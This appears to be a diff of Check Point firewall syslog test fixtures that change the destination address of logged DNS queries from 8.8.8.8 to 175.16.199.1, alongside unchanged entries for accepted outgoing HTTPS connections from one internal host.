gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52732"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53883"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38848"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44856"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53216"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55992"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50371"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55992"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50371"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38624"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52838"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38144"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47601"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52838"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38144"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47601"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.169"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51626"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57220"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52854"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57220"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52854"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53222"; service:"443"; 
service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33730"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34470"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44011"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33730"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & 